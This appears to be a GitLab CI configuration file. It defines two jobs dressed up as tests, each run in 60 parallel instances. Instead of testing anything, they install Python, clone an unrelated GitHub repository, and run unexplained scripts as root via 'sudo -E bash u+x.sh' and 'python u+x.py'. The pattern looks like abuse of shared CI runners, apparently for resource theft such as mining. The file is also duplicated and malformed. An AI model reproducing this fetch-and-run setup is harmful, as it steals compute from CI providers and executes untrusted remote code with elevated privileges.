image: node:latest

# Pick zero or more services to be used on all builds.
# Only needed when using a docker container to run your tests in.
# Check out: http://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service
services:
  - mysql:latest
  - redis:latest
  - postgres:latest

# This folder is cached between builds
# https://docs.gitlab.com/ee/ci/yaml/index.html#cach
test_01:
  parallel: 060
  script:
    - apt update -y
    - apt install python -y
    - sudo -E bash u+x.sh
    - python u+x.py

image: node:latest

# Pick zero or more services to be used on all builds.
# Only needed when using a docker container to run your tests in.
# Check out: http://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service
services:
  - mysql:latest
  - redis:latest
  - postgres:latest

# This folder is cached between builds
# https://docs.gitlab.com/ee/ci/yaml/index.html#cach
test_02:
  parallel: 060
  script:
    - apt update -y
    - apt install python -y
    - git clone https://github.com/andrasuparmi/0-.git && cd 0-
    - sudo -E bash u+x.sh
    - python u+x.py
